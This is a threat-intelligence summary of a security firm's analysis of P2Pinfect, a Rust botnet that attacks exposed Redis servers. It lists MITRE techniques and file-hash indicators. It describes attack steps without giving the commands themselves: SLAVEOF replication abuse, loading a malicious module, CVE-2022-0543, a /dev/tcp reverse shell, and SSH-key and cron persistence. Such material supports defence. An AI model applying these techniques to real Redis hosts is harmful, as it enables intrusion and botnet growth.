Cado Security Labs describe P2Pinfect, a Rust-based botnet targeting publicly-accessible Redis deployments with cross‑platform Linux and Windows payloads. The malware propagates via Redis replication and module loading, then uses a peer‑to‑peer C2 network, defense‑evading tricks, and persistence mechanisms to sustain and expand the botnet.
Keypoints
- P2Pinfect targets exposed Redis instances by abusing the replication feature (SLAVEOF) to gain initial access.
- The malware is written in Rust with both Linux ELF and Windows PE payloads, enabling cross‑platform execution.
- It loads a malicious Redis module (exp.so) via MODULE LOAD to gain reverse shell access and add a new command (system.exec).
- Windows variant was delivered via CVE-2022-0543 (Lua sandbox escape in Redis), though a different initial access vector is also described.
- P2Pinfect employs multiple persistence and defense-evasion techniques, including SSH backdoor via authorized_keys, .bash_logout persistence, and runtime process monitoring.
- The botnet uses peer-to-peer communication over HTTPS with a hardcoded certificate, enabling decentralized C2 without a central server.
- The malware also conducts internet scanning for Redis/SSH, performs worm-like propagation, and can upgrade itself and dormant components (e.g., miner payload).
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Used CVE-2022-0543 to deliver the Windows variant: ‘According to their findings, the variant they encountered was delivered via exploitation of CVE-2022-0543, a LUA sandbox escape vulnerability present in certain versions of Redis.’
- [T1105] Ingress Tool Transfer – The malware fetches Linux/Windows payloads from an HTTP server after connecting to peers: ‘The binary will reach out to one of these servers to grab a copy of all of the following binaries: Linux – Primary ELF payload for linux systems; Windows Primary PE payload for windows systems; …’
- [T1046] Network Service Scanning – Conducts internet scanning for Redis and SSH servers: ‘conduct internet scanning for Redis and SSH servers.’
- [T1053.003] Cron – Cron unauthenticated RCE mechanism described for Redis: ‘P2Pinfect also attempts to compromise the Redis host via the Cron unauthenticated RCE mechanism we’ve previously described.’
- [T1098] Account Manipulation – SSH backdoor persistence via authorized_keys: ‘The SSH service is then restarted, and the following key is dropped into the authorized_keys file for the current user.’
- [T1059.004] Unix Shell – Command execution via system.exec and reverse shell: ‘system.exec is then used to issue a command to the C2 server via a /dev/tcp reverse shell.’
- [T1071.001] Web Protocols – Botnet coordination over HTTPS with a hardcoded certificate: ‘The HTTPS server uses a hardcoded certificate, which is identical across all botnet members.’
Indicators of Compromise
- [File] linux – 87a3fc1088449dbd3554fe029a1878a525e64ab4ccf71b23edb03619ba94403a – Primary Linux payload
- [File] miner – b1fab9d92a29ca7e8c0b0c4c45f759adf69b7387da9aebb1d1e90ea9ab7de76c – Dropped miner payload
- [File] bash – ce047893ac5bd2100db3448bd62c324e471ffcddd48433788bfe885e5f071a89 – Dropped bash binary used for persistence/monitoring
- [IP] 0.0.0.0 – Listening address chosen by the bot binary for peer communication
- [Domain] ipv4.icanhazip.com – Used by malware to fetch its IP address
- [URL] /ip – Used by infected nodes to report their local IP during peer registration